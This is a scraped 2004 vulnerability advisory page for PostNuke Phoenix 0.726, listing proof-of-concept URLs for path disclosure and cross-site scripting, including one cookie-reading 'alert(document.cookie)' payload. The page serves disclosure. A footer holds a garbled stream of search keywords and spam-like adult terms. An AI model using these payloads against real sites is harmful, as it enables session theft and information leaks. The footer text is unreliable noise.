exploits , vulnerabilities , articles , PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
| Title |
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities |
| Published |
2004-04-21-12:00AM |
| Updated |
2004-04-21-10:57PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery of these vulnerabilities has been credited to Janek Vind <come2waraxe@yahoo.com>. |
| Vulnerable |
PostNuke Development Team PostNuke Phoenix 0.726 |
| Not Vulnerable |
|
| Code |
The following examples have been supplied:
Path disclosure: http://www.example.com/postnuke0726/includes/blocks/finclude.php http://www.example.com/postnuke0726/pnadodb/drivers/adodb-access.inc.php http://www.example.com/postnuke0726/modules/NS-NewUser/user.php http://www.example.com/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php http://www.example.com/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome http://www.example.com/postnuke0726/modules/NS-LostPassword/user.php http://www.example.com/postnuke0726/modules/NS-Multisites/chgtheme.inc.php http://www.example.com/postnuke0726/modules/NS-Multisites/head.inc.php http://www.example.com/postnuke0726/modules/NS-Multisites/print.inc.php http://www.example.com/postnuke0726/modules/NS-User/tools.php http://www.example.com/postnuke0726/modules/NS-User/user.php
Cross-Site Scripting: http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here] http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here] http://www.example.com/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here] http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here] http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Wed, 16 Dec 2009 22:23:15 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c 2...n.com/ www.0531ji sperl Microsoft www.netara 2...n.com/ cinemademo Navya Crack Data www.dldvb. 2...n.com/ www.80845. IIS 6 Buff nude priy PDadmin sexy grils Sex indian Vidio sex sho sex 2...n.com/ 18qd.com www.80845. ssi.php free sexy 2...n.com/ fxw.org.ua zone alarm 2...n.com/ %nload.php www sex.co OpenSSL AS 2...n.com/ __97b__Gue trishase Chicas des www.mbatem apache 2.0 maxcpm.inf ww89.com 2...n.com/ free sexi Www.arabXX 2...n.com/ Www.Thresh news for c www.hneca. 2...n.com/ Porna xxx girls
|